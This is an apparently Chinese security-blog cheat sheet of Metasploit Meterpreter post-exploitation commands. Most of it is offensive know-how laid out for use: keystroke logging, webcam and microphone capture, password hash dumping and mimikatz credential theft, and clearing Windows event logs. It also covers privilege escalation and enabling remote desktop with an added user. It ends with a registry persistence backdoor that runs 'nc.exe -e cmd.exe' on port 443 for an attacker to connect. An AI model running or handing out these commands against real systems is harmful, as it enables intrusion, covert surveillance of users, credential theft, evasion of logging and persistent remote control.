标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2780]   作者: hudie 发表于: [2020-11-12]

本文共 [381] 位读者顶过

前言

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。

[出自:jiwo.org]

常用命令
sessions -i 进入会话
sessions -k 杀死会话
pwd         查看当前目录
getuid      查看当前用户信息
sysinfo     查看远程主机系统信息
execute     在目标主机上执行命令
hashdump    获取目标主机用户密码hash信息
getsystem   提升权限
shell       切换至传统shell
background  将当前session放入后台
kill        关闭进程
load        加载meterpreter扩展
exit        退出当前shell
arp         显示ARP缓存
getproxy    显示当前代理配置
ifconfig    显示接口
ipconfig    显示接口
netstat     显示网络连接
portfwd     将本地端口转发到远程服务
route       查看和修改路由
getenv      查看环境变量
getprivs    查看权限
pgrep       搜索进程
ps          查看当前运行进程
reboot      重启系统
reg         修改注册表
clearev     清除windows中的应用程序日志、系统日志、安全日志


文件系统命令
cat           查看文件
cd            改变目录
checksum      校验文件md5或sha1
cp            拷贝文件
download      下载文件
edit          编辑文件
ls            列出文件
mkdir         创建文件夹
mv            移动文件
rm            删除文件
rmdir         删除文件夹
search        查找文件
show_mount    列出所有驱动器
upload        上传文件

用户设备命令
enumdesktops   列出所有可访问的桌面和窗口
getdesktop     获取当前桌面
idletime       获取远程系统已运行时间(从上次重新启动开始计算)
keyboard_send  发送击键
keyscan_dump   转储击键缓冲区
keyscan_start  开始捕获击键
keyscan_stop   停止捕获击键
mouse          发送鼠标事件
screenshare    实时观看远程用户的桌面
screenshot     截屏
setdesktop     更改shell当前桌面
uictl          控制用户界面组件
record_mic     记录麦克风一定秒数
webcam_chat    开始视频聊天
webcam_list    列出网络摄像头
webcam_snap    从指定网络摄像头拍摄
webcam_stream  播放指定网络摄像头的视频流
play           在目标系统播放音频

mimikatz抓取密码
load mimikatz   加载mimikatz模块
help mimikatz   查看帮助
wdigest         获取密码


开启远程桌面
run vnc 使用vnc连接远程桌面
run getgui -e 开启远程桌面
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   将3389端口转发到6662

收集信息
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

针对未安装补丁攻击
run post/windows/gather/enum_patches  收集补丁信息
攻击:
msf > use exploit/windows/local/xxxx
msf > set SESSION 2
msf > exploit

注册表设置nc后门
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.159.144 443  #攻击者连接nc后门



评论

暂无
发表评论
 返回顶部 
热度(381)
 关注微信